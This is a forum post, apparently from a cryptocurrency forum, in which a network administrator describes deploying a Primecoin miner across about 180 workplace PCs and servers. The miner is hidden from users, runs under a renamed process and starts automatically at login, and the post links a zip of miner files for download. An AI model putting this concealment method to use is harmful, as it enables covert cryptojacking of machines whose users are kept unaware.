Auto hidden mining for 32 & 64 bit

I am an administrator or a moderate network of about 180 PC’s and 22 Servers.

I began mining coins last week and thought about using work resources to also do some mining. 95% of our CPU power stayed unused as we had migrated to a terminal environment so 100% CPU usage on desktops was not going to limit a users performance.

** DO NOT MINE ON WORK MACHINES WITH OUT PERMISSION!!! This is theft with out the blessing of your company.**

After some tinkering i have managed to do the following with the Primeminer client

[size=14pt]This is for the Beeeeer Pool. [/size]

[ul][li]The client starts 1 minute after any user logs into a machine. Tested working in Windows, XP, Vista, 7, 8, Server 2003 and Server 2008

[/li][li]The Client is fully hidden from the users view. No command window. I have also renamed the process to something less conspicuous than “primeminer” We have a few users that are pretty anal about things they see running that don’t seem to belong.

[/li][li]So i can check on the miners. All of them write to a .txt file so i can check on them from time to time and confirm they are working.

[/li][/ul]

Things i have left to do.

[ul][li]Write a program so that when PC’s are not idle mining will stop. After being idle for 5 minutes the miner will begin again.

[/li][li]Write a management portal so all miners can be checked at once or at least polled. I believe i should be able to just download each of the .txt files parse out the info i need then display an output.

[/li][li]Figure out a way for the program to auto detect the number of threads by itself. Having to edit the number constantly is annoying.
[/li][/ul]

You can download the miners from here
https://www.dropbox.com/s/hh1g25qoe1pjv8l/Prime%20Coin%20Miners.zip

If you do not trust the miner files and i don’t blame you, you can simply download the primeminer_x64 or x32 and modify the batch file to your needs.